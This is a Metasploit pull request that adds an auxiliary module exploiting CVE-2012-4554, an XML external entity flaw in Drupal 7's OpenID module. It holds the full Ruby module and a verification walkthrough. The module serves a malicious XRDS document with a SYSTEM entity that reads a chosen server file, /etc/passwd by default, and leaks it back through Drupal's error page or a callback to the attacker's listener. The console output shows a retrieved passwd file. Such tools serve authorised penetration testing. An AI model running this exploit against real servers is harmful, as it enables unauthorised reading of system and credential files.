### PR TITLE
Add module for CVE-2012-4554

### DIFF
--- a/modules/auxiliary/gather/drupal_openid_xxe.rb
+++ b/modules/auxiliary/gather/drupal_openid_xxe.rb
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
         This module abuses a XML External Entity Injection on the OpenID module
         from Drupal. The vulnerability exists on the parsing of a malformed XRDS
         file coming from a malicious OpenID endpoint. This module has been tested
-        successfully on Drupal 7.15 with the OpenID module enabled.
+        successfully in Drupal 7.15 with the OpenID module enabled.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>

--- a/modules/auxiliary/gather/drupal_openid_xxe.rb
+++ b/modules/auxiliary/gather/drupal_openid_xxe.rb
@@ -32,6 +32,7 @@ class Metasploit3 < Msf::Auxiliary
           [ 'CVE', '2012-4554' ],
           [ 'OSVDB', '86429' ],
           [ 'BID', '56103' ],
+          [ 'URL', 'https://drupal.org/node/1815912' ],
           [ 'URL', 'http://drupalcode.org/project/drupal.git/commit/b912710' ],
           [ 'URL', 'http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution' ]
         ],

--- a/modules/auxiliary/gather/drupal_openid_xxe.rb
+++ b/modules/auxiliary/gather/drupal_openid_xxe.rb
@@ -1,0 +1,174 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Drupal OpenID External Entity Injection',
+      'Description'    => %q{
+        This module abuses a XML External Entity Injection on the OpenID module
+        from Drupal. The vulnerability exists on the parsing of a malformed XRDS
+        file coming from a malicious OpenID endpoint. This module has been tested
+        successfully on Drupal 7.15 with the OpenID module enabled.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Reginaldo Silva', # Vulnerability discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2012-4554' ],
+          [ 'OSVDB', '86429' ],
+          [ 'BID', '56103' ],
+          [ 'URL', 'http://drupalcode.org/project/drupal.git/commit/b912710' ],
+          [ 'URL', 'http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution' ]
+        ],
+      'DisclosureDate' => 'Oct 17 2012'
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "Base Drupal directory path", '/drupal']),
+        OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/passwd"])
+      ], self.class)
+
+  end
+
+  def xrds_file
+    xrds = <<-EOF
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [
+<!ELEMENT URI ANY>
+<!ENTITY xxe SYSTEM "file://#{datastore['FILEPATH']}">
+]>
+<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns="xri://$xrd*($v*2.0)" xmlns:openid="http://openid.net/xmlns/1.0">
+<XRD>
+  <Status cid="verified"/>
+  <ProviderID>xri://@</ProviderID>
+  <CanonicalID>http://example.com/user</CanonicalID>
+  <Service>
+    <Type>http://specs.openid.net/auth/2.0/signon</Type>
+    <Type>http://openid.net/srv/ax/1.0</Type>
+    <URI>#{get_uri}/#{@prefix}/&xxe;/#{@suffix}</URI>
+    <LocalID>http://example.com/xrds</LocalID>
+  </Service>
+</XRD>
+</xrds:XRDS>
+EOF
+    return xrds
+  end
+
+  # priority="10">
+
+  def primer
+    res = send_openid_auth
+
+    if res.nil?
+      # nothing to do here...
+      service.stop
+      return
+    end
+
+    unless res.code == 500
+      print_warning("#{peer} - Unexpected answer, trying to parse anyway...")
+    end
+
+    error_loot = parse_loot(res.body)
+
+    # Check if file was retrieved on the drupal answer
+    # Better results, because there isn't URL encoding,
+    # plus probably allows to retrieve longer files.
+    unless error_loot.blank?
+      print_status("#{peer} - File found on the Drupal answer")
+      store(error_loot)
+      service.stop
+      return
+    end
+
+    # Check if file was leaked to the fake OpenID endpoint
+    # Contents are probably URL encoded, plus probably long
+    # files aren't full, but something is something :-)
+    unless @loot.blank?
+      print_status("#{peer} - File contents leaked through the OpenID request")
+      store(@loot)
+      service.stop
+      return
+    end
+
+    # Nothing :( just stop the service
+    # so the auxiliary module stops
+    service.stop
+  end
+
+  def run
+    @prefix = Rex::Text.rand_text_alpha(4 + rand(4))
+    @suffix = Rex::Text.rand_text_alpha(4 + rand(4))
+    exploit
+  end
+
+  def on_request_uri(cli, request)
+    if request.uri =~ /#{@prefix}/
+      vprint_status("Signature found, parsing file...")
+      @loot = parse_loot(request.uri)
+      return
+    end
+
+    print_status("Sending XRDS...")
+    send_response_html(cli, xrds_file, { 'Content-Type' => 'application/xrds+xml' })
+  end
+
+  def send_openid_auth
+    res = send_request_cgi({
+      'uri'    => normalize_uri(target_uri.to_s, "/"),
+      'method' => 'POST',
+      'vars_get' => {
+        "q" => "node",
+        "destination" => "node"
+      },
+      'vars_post' => {
+        "openid_identifier" => "#{get_uri}",
+        "name" => "",
+        "pass" => "",
+        "form_id" => "user_login_block",
+        "op" => "Log in"
+      }
+    })
+
+    return res
+  end
+
+  def store(data)
+    path = store_loot("drupal.file", "text/plain", rhost, data, datastore['FILEPATH'])
+    print_good("#{peer} - File saved to path: #{path}")
+  end
+
+  def parse_loot(data)
+    return nil if data.blank?
+
+    # Full file found
+    if data =~ /#{@prefix}\/(.*)\/#{@suffix}/m
+      return $1
+    end
+
+    # Partial file found
+    if data =~ /#{@prefix}\/(.*)/m
+      return $1
+    end
+
+    return nil
+  end
+
+end
+

--- a/modules/auxiliary/gather/drupal_openid_xxe.rb
+++ b/modules/auxiliary/gather/drupal_openid_xxe.rb
@@ -70,8 +70,6 @@ EOF
     return xrds
   end
 
-  # priority="10">
-
   def primer
     res = send_openid_auth
 

--- a/modules/auxiliary/gather/drupal_openid_xxe.rb
+++ b/modules/auxiliary/gather/drupal_openid_xxe.rb
@@ -187,7 +187,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def store(data)
     path = store_loot("drupal.file", "text/plain", rhost, data, datastore['FILEPATH'])
-    print_good("#{peer} - File saved to path: #{path}")
+    print_good("#{peer} - File found and saved to path: #{path}")
   end
 
   def parse_loot(data)


### PR DESCRIPTION
Abuses CVE-2012-4554, the XXE found on the Drupal OpenID code.
## Verification
- Install Drupal 7 <= 7.15
- As Drupal Admin, enable the OpenID module (**It's disabled by default**)
- Run msfconsole and `use auxiliary/gather/drupal_openid_xxe`
- `set RHOST <target_ip>`
- `set TARGETURI <drupal_base_dir>`
- run `check`, VERIFY which the service is detected as running.

```
msf > use auxiliary/gather/drupal_openid_xxe 
msf auxiliary(drupal_openid_xxe) > set RHOST 192.168.172.134
RHOST => 192.168.172.134
msf auxiliary(drupal_openid_xxe) > set TARGETURI /drupal-7.2/
TARGETURI => /drupal-7.2/
msf auxiliary(drupal_openid_xxe) > check
[*] The target service is running, but could not be validated.
msf auxiliary(drupal_openid_xxe) > 
```
- set FILEPATH <remote_file>  (tries to retrieve /etc/passwd) by default
- `run`, VERIFY which is able to retriev and store the remote file:

```
msf auxiliary(drupal_openid_xxe) > run

[*] Using URL: http://0.0.0.0:8080/ZDeUVWyl
[*]  Local IP: http://10.6.0.165:8080/ZDeUVWyl
[*] Server started.
[*] 10.6.0.165       drupal_openid_xxe - Sending XRDS...
[*] 192.168.172.134:80 - Searching loot on the Drupal answer...
[+] 192.168.172.134:80 - File found and saved to path: /Users/juan/.msf4/loot/20140123193915_default_192.168.172.134_drupal.file_918176.txt
[*] Server stopped.
[*] Auxiliary module execution completed
```
- Verify the file contents:

```
msf auxiliary(drupal_openid_xxe) > cat /Users/juan/.msf4/loot/20140123193915_default_192.168.172.134_drupal.file_918176.txt
[*] exec: cat /Users/juan/.msf4/loot/20140123193915_default_192.168.172.134_drupal.file_918176.txt

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:107::/var/run/dbus:/bin/false
avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:104:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
couchdb:x:105:113:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash
speech-dispatcher:x:106:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
usbmux:x:107:46:usbmux daemon,,,:/home/usbmux:/bin/false
haldaemon:x:108:114:Hardware abstraction layer,,,:/var/run/hald:/bin/false
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:110:115:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:111:117:RealtimeKit,,,:/proc:/bin/false
saned:x:112:118::/home/saned:/bin/false
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
gdm:x:114:120:Gnome Display Manager:/var/lib/gdm:/bin/false
mysql:x:115:123:MySQL Server,,,:/var/lib/mysql:/bin/false
```
